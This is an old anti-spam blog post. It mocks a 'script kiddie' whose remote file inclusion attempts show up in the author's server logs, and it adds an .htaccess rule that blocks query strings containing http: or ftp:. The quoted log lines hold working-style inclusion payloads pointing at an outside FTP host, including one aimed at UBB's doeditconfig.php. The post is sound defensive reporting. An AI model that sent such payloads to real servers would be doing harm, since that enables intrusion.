Damn Spam!
Search 

User Functions






Lost your password?

Offtopic: A script kiddie discovers the ftp: link

    
Saturday, February 23 2008 @ 01:30 CET
Contributed by: Dirk

I ranted about those stupid script kiddies and their fruitless yet annoying attempts to exploit something that isn't there before. Of course that didn't change a thing - we're still seeing more than 20% of the requests on our webserver being inclusion attempts.

A new variation, however, is the use of ftp: links for the inclusion attempt:

81.89.137.99 - - [23/Feb/2008:00:10:34 -0500] "GET /forum/!scanftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:00:10:34 -0500] "GET /!scanftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:00:46 -0500] "GET /forum/index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:00:46 -0500] "GET /index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:01:59 -0500] "GET /forum/index.php?show=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:01:59 -0500] "GET /index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:31:14 -0500] "GET /forum/admin/doeditconfig.php?thispath=../includes&config[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:31:14 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"

This still seems to be somewhat experimental, though. Notice how the first two requests are broken, as they used "scanftp:", which isn't a valid scheme. The next two are useless, too, since those scripts don't have a "show" parameter. I also like how he threw in an http: inclusion attempt to see if that would make a difference.

The final attempts to exploit something in a file named doeditconfig.php (which is nowhere to be found on our site) appears to be an exploit copied straight from milw0rm. Too bad it's targetted at UBB, which we don't run.

I'd give him +1 point for creativity and -2 points for being too stupid to know what to do with it.

Btw, we have a simple .htaccess rule to block http: inclusion attempts. Let's expand that to cover ftp: links, too: 


  RewriteEngine On
  RewriteCond %{QUERY_STRING} ^.+http: [OR]
  RewriteCond %{QUERY_STRING} ^.+ftp:
  RewriteRule .* - [L,F]

There, that should do it.

Filed under: Miscellaneous
()

View Printable Version

Trackback

Trackback URL for this entry: http://spam.tinyweb.net/trackback.php/script-kiddie-and-ftp-link

No trackback comments for this entry.
Offtopic: A script kiddie discovers the ftp: link | 2 comments | Create New Account
The following comments are owned by whomever posted them. This site is not responsible for what they say.
Offtopic: A script kiddie discovers the ftp: link
Hey there, cheers to this blog.
It appears to me that there's a new kind of spam-type getting popular. Let's call it minimal-friendly. minimal because it holds one link, friendly because it compliments the posts/blog/forum/site. An example would be comment #7 here (or in case it is deleted at the time of you reading this, here's a screen!)
Authored by: Anonymous on Tuesday, March 25 2008 @ 12:58 CET
[ Reply to This | # ]
Compliment spam

Compliment spam isn't anything new really. It's just that every once in a while a new spammer seems to "discover" that sort of thing again.

Authored by: Dirk on Tuesday, March 25 2008 @ 01:11 CET
[ Reply to This | # ]

Copyright © 2008 Damn Spam! Powered By Geeklog